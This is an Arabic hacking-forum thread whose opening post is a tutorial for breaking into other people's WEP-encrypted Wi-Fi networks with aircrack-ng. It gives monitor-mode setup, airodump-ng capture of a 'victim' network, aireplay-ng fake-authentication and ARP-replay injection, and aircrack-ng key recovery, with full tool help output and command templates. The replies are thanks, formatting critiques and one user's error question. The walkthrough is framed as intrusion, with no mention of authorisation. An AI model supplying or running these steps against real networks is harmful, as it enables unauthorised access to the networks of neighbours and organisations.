الدرس الثاني ... الحرب الاكترونية

الدرس الثاني ... الحرب الاكترونية


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 17

الموضوع: الدرس الثاني ... الحرب الاكترونية

  1. #1

    aljyyosh الدرس الثاني ... الحرب الاكترونية

    بسم الله و السلام عليكم ورحمة الله

    جميع الحقوق محفوظة

    لا نقبل اي نسخ دون ذكر الكاتب مع المصدر (جيوش الهكر)

    اليوم نشرج فقط aircrack-ng

    و تنقسم هذه الاداة الى :

    Aircrack-ng suite



    airbase-ng -- Multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself.


    aircrack-ng -- 802.11 WEP and WPA/WPA2-PSK key cracking program.


    airdecap-ng -- Decrypt WEP/WPA/WPA2 capture files.


    airdecloak-ng -- Remove WEP Cloaking™ from a packet capture file.


    airdriver-ng -- Script providing information and allowing installation of wireless drivers.


    airdrop-ng -- A rule based wireless deauthication tool.


    aireplay-ng -- Inject and replay wireless frames.


    airgraph-ng -- Graph wireless networks.


    airmon-ng -- Enable and disable monitor mode on wireless interfaces.


    airodump-ng -- Capture raw 802.11 frames.


    airolib-ng -- Precompute WPA/WPA2 passphrases in a database to use it later with aircrack-ng.


    airserv-ng -- Wireless card TCP/IP server which allows multiple application to use a wireless card.


    airtun-ng -- Virtual tunnel interface creator.


    easside-ng -- Auto-magic tool which allows you to communicate to an WEP-encrypted Access Point without knowing the key.


    packetforge-ng -- Create various type of encrypted packets that can be used for injection.


    tkiptun-ng -- Proof-of-concept implementation the WPA/TKIP attack: inject a few frames into a WPA TKIP network with QoS


    wesside-ng -- Auto-magic tool which incorporates a number of techniques to seamlessly obtain a WEP key in minutes.


    Other tools - WZCook and ivstools


    و هذه دورة باللغة الاجنبية انصحكم بها

    http://www.youtube.com/channel/UCs X...oK Ag/v ideo s


    طبعا هذا لا يعني اني لن اشرح الادوات ... لا لا راح اشرحها بس مو كلها بس المهم

    اهم اداة من ادوات ايركراك هي :

    airmon-ng
    airodump-ng
    aireplay-ng
    airdrop-ng
    aircrack-ng

    اول اداة ... هذي الاداة من اهم الادوات و لو من دونها لايمكن عمل اي شي

    هذه الاداة لو كتبت في ال"الطرفية"(terminal) و تكتب "airmon-ng" راح تلاحظ يكتبلك كروت الوايرليس الموجودة عندك



    الدرس الثالث الحرب الاكترونية
    الان تلاحظ وجود wlan0 و هذه كارت الوايرليس تبعي لو مكانش موجود اي كارت واير ليس هذا لازم تدخل عل درس حل مشكلة الواير ليس و انشاء الله في الدرس القادم

    والان حتى نبدي نخترق الوايرليس لازم نعرف انو الكرت الشبكة كبيرة و راح نعملها فرع

    تسالون كيف اقولكم راح نكتب بالترمنال "الطرفية"

    airmon-ng start wlan0

    راح تلاحظ الصورة التالية



    احنة الي يهمنا اخر سطر و الي هو "monitor mode enabled on mon0"

    تمام الان ننسى wlan0 راح يكون كل شغلنا عل mon0

    الان عملنا شبكة فرعية لسهولة العمل

    خلص شغلنا عل airmon-ng

    نجي عل airodump-ng

    هذه الاداة وضيفتها اختراق الاشبكات + عرض الشبكات الموجودة حولك مع كل المعلومات

    الان شوية ندرس الاداة لانها مهمة جدا

    نكتب في ترمنال"الطرفية" airodump-ng

    ________________________________________

    Airodump-ng 1.1 - (C) 2006-2010 Thomas d'Otreppe
    Original work: Christophe Devine
    Aircrack-ng

    usage: airodump-ng <options> <interface>[,<interface>,...]

    Options:
    --ivs : Save only captured IVs
    --gpsd : Use GPSd
    --write <prefix> : Dump file prefix
    -w : same as --write
    --beacons : Record all beacons in dump file
    --update <secs> : Display update delay in seconds
    --showack : Prints ack/cts/rts statistics
    -h : Hides known stations for --showack
    -f <msecs> : Time in ms between hopping channels
    --berlin <secs> : Time before removing the AP/client
    from the screen when no more packets
    are received (Default: 120 seconds)
    -r <file> : Read packets from that file
    -x <msecs> : Active Scanning Simulation
    --output-format
    <formats> : Output format. Possible values:
    pcap, ivs, csv, gps, kismet, netxml

    Filter options:
    --encrypt <suite> : Filter APs by cipher suite
    --netmask <netmask> : Filter APs by mask
    --bssid <bssid> : Filter APs by BSSID
    -a : Filter unassociated clients

    By default, airodump-ng hop on 2.4GHz channels.
    You can make it capture on other/specific channel(s) by using:
    --channel <channels>: Capture on specific channels
    --band <abg> : Band on which airodump-ng should hop
    -C <frequencies> : Uses these frequencies in MHz to hop
    --cswitch <method> : Set channel switching method
    0 : FIFO (default)
    1 : Round Robin
    2 : Hop on last
    -s : same as --cswitch

    --help : Displays this usage screen

    No interface specified.

    ______________________________________________

    خخخخخخخخخ اكيد الكل ميفتهم .... هسة افهمكم المهم بس

    لو تكتب في ترمنال

    airodump-ng mon0

    راح يعرضلك الشبكات الموجودة حولك

    مثال :



    لون الاحمر هو اسماء الشبكات الموجودة حولك
    لون الاصفر نوع تشفير الباس
    لون الازرق هو ماك ادرس حق الراوتر
    لون اخضر هو بوكيت المرسلة والمستقبلة و الضائعة
    لان نشرح الوردي و الازرق الفاتح

    راح تشوفون مكتوب bssid و station

    الاماك ادرس الموجود في الازرق الفاتح هي راوتر

    و الماك ادرس المجودة في لون الوردي هي اجهزة موجودة عل هذا الراوتر مثلا انا ماك ادرس راوتري عليها جهاز واحد وهي جهازي

    المهم خلصنا من هذا نجي عل امر غيرها و هي لو كتبنا في ترمنال

    airodump-ng --channel [Victim channel] --write [NAME] --bssid [Victim BSSID] [your interface]

    الان هذه طريقة جلب باس لكنها تكون مشفرة

    تكتبون بدل هذه الكلمات حسب نوع الشبكة الي حولك

    نسيت اخبركم عن كيفية استغراج [Victim channel] و هي تكون بين لون اصفر و الازرق تكتب تحت CH

    و ثاني شي [NAME] نكتب هون اي سم تريد بس يكون ما فيها فراغات

    و ثالث شي [Victim BSSID] نكتب الماك ادرس حق الراوتر

    و رابع شي [your interface] نكتب اهنا mon0 نكتب النت الي عملناها فرعي و دائما تكون mon0

    مثال : airodump-ng --channel 11 --write shayar --bssid 11:22:33:44:55:66 mon0]

    الان نضغط انتر

    و نفتح ترمنال جديد

    و الان نروح عل اداة aireplay-ng و نكتبها في ترمنال اسم الاداة

    Aireplay-ng 1.1 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe
    Original work: Christophe Devine
    Aircrack-ng

    usage: aireplay-ng <options> <replay interface>

    Filter options:

    -b bssid : MAC address, Access Point
    -d dmac : MAC address, Destination
    -s smac : MAC address, Source
    -m len : minimum packet length
    -n len : maximum packet length
    -u type : frame control, type field
    -v subt : frame control, subtype field
    -t tods : frame control, To DS bit
    -f fromds : frame control, From DS bit
    -w iswep : frame control, WEP bit
    -D : disable AP detection

    Replay options:

    -x nbpps : number of packets per second
    -p fctrl : set frame control word (hex)
    -a bssid : set Access Point MAC address
    -c dmac : set Destination MAC address
    -h smac : set Source MAC address
    -g value : change ring buffer size (default: 8)
    -F : choose first matching packet

    Fakeauth attack options:

    -e essid : set target AP SSID
    -o npckts : number of packets per burst (0=auto, default: 1)
    -q sec : seconds between keep-alives
    -y prga : keystream for shared key auth
    -T n : exit after retry fake auth request n time

    Arp Replay attack options:

    -j : inject FromDS packets

    Fragmentation attack options:

    -k IP : set destination IP in fragments
    -l IP : set source IP in fragments

    Test attack options:

    -B : activates the bitrate test

    Source options:

    -i iface : capture packets from this interface
    -r file : extract packets from this pcap file

    Miscellaneous options:

    -R : disable /dev/rtc usage

    Attack modes (numbers can still be used):

    --deauth count : deauthenticate 1 or all stations (-0)
    --fakeauth delay : fake authentication with AP (-1)
    --interactive : interactive frame selection (-2)
    --arpreplay : standard ARP-request replay (-3)
    --chopchop : decrypt/chopchop WEP packet (-4)
    --fragment : generates valid keystream (-5)
    --caffe-latte : query a client for new IVs (-6)
    --cfrag : fragments against a client (-7)
    --test : tests injection and quality (-9)

    --help : Displays this usage screen

    No replay interface specified.

    طبعا الي يريد يدرس الاداة يقراها و احنة الي نريدها اختراق و راح ندرس الي بس نريدها


    aireplay-ng -1 0 -a [Victrim BSSID] [your interface]

    طبعا عارفين [Victrim BSSID] هي ماك ادرس حق الراوتر

    و [your interface] هي mon0

    الان نفتح ترمنال جديد

    و

    aireplay-ng -3 -b [Victim BSSID] [your interface]

    ما راح اعيد و هيك يكون خلصنا جزء الاول نجي للجزء الثاني

    و هي فك التشفير

    الان لو فتحت مجلد root راح تلقا فيها ملفات جديدة
    و الملفات مسمى عل الي كتبناه في [NAME]


    هذه ملفات مشفرة تحتوي عل الباس نروح الى اداة aircrack-ng

    و هذه الاداة يقوم بفك تشفير الباس او الملف بامدادات cap

    و نقوم بكتابة

    aircrack-ng -b [victrim bssid] [*.cap]

    راح تلاقي الاداة يكشف التشفير
    و راح يكتبلك



    key found

    و تلاحظ مكتوب الباس بين قوسين و انت شيل : و يصير الباس يعني مثلا انا طلعلي 11:33:44:88:sf:99

    يعني الباس حق الشبكة هي sf9911334488

    و خلص درسنا و الحمدالله

    اخوكم شايار

    للاستفسار : [email protected]

    جميع الحقوق محفوظة ...الدرس الثاني ... الحرب الاكترونية
    اخترقتك بس انت متعرف

  2. #2

    افتراضي رد: الدرس الثاني ... الحرب الاكترونية

    ﻣﺸﻜﻮﺭ حبي ﺑﺲ ﻣﻌﻠﺶ ﺍﻋﻠﻘﻠﻚ ﻋﻠﻰ ﺷﻐﻠﺔ ﻟﻮ ﺗﻮﺿﻊ ﺻﻮﺭ ﻟﻠﺸﺮﺡ ﻭﺷﻮﻳﻪ ﺗﺮﺗﻴﺐ ﻳﻂﻠﻊ ﺷﺮﺡ ﻣﻤﻴﺰ ﻣﺸﻜﻮﺭ ﺟﺪﺍ

    ✔™Verified Account™✔
    ││█║▌║▌ █ ║▌│█│║▌
    skype belal.root

    my facebook: fb.com/palastenian.ghost
    fb.com/jor.ghost

    my website: http://jordanghost.webs.com/

  3. #3

    افتراضي رد: الدرس الثاني ... الحرب الاكترونية

    والله اخي الصور ممكن متكون واضحة دئما و بعض الاحيان الصور ما نحتاجها مثلا لجملة و حدة ميريد اصور و احمل صور و اجيب الروابط يعني الشغل طويل بس في اشياء ما تفتهم بدون صور :\ و انشاء الله احط صور اكثر في الدروس الجاية
    اخترقتك بس انت متعرف

  4. #4

    افتراضي رد: الدرس الثاني ... الحرب الاكترونية

    مشكور للطرح اخي واصل


    رتب اكثر في المرة القادمة
    لـن نرحم الضعفاء حتى يصبحوا اقوياء واذا اصبحوا اقوياء فلن تجوز الرحمة عليهم

    اذا مدت يدك لتمسني سأرفع قبعتي احتراماً لشجاعتك ولكن تأكد اني لن أنزلها إلا على قبرك


    يوجد ايميلات ثلاثية للمبادلة



  5. #5

    افتراضي رد: الدرس الثاني ... الحرب الاكترونية

    مشكور يا اخي جدا لكن شرح شوية مو مرتب

  6. #6
    هكر متألق الصورة الرمزية Iraqe Hacker
    تاريخ التسجيل
    Jul 2012
    الدولة
    Iraqe Hacker™ ✔©Page&Official®Mafia █║▌│█│║▌║││█║▌║▌║
    المشاركات
    3,254

    افتراضي رد: الدرس الثاني ... الحرب الاكترونية

    على الجايات طور المواضيع بارك الله فيك طرح حلو ومفيد

  7. #7

    افتراضي رد: الدرس الثاني ... الحرب الاكترونية

    يسلمو الايادي

  8. #8

    افتراضي رد: الدرس الثاني ... الحرب الاكترونية

    بارك الله فيك

  9. #9
    هكر مبتديء
    تاريخ التسجيل
    Jul 2012
    الدولة
    بغداد
    المشاركات
    6

    افتراضي رد: الدرس الثاني ... الحرب الاكترونية

    حبيبي اولا السلام عليكم بس اني يطلعلي(please specify a dictionaary)ارجو المساعدة
    ملاحظة:هاي الرسالة تطلعلي من اريد افك تشفير الملف

  10. #10

    افتراضي رد: الدرس الثاني ... الحرب الاكترونية

    مشكور للطرح اخي واصل

صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. مقدمة ... الحرب الاكترونية
    بواسطة شايار في المنتدى قسم باك تراك BackTrack
    مشاركات: 6
    آخر مشاركة: 11-11-2013, 09:41 AM
  2. الدرس الاول ... الحرب الاكترونية
    بواسطة شايار في المنتدى قسم باك تراك BackTrack
    مشاركات: 15
    آخر مشاركة: 11-08-2013, 02:07 PM
  3. {الجزء الثاني} الدرس الثاني: شرح معظم أدوات الميتاسبلويت في الويندوز
    بواسطة aymen cyril kamar في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 21
    آخر مشاركة: 08-02-2013, 11:36 AM
  4. الدرس الثاني
    بواسطة MOSTAFA2000 في المنتدى لغات برمجة المواقع
    مشاركات: 5
    آخر مشاركة: 05-26-2012, 05:40 AM
  5. الدرس الثاني عشر في لغة php
    بواسطة Abdullhadi JC في المنتدى لغات برمجة المواقع
    مشاركات: 2
    آخر مشاركة: 05-15-2012, 04:44 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •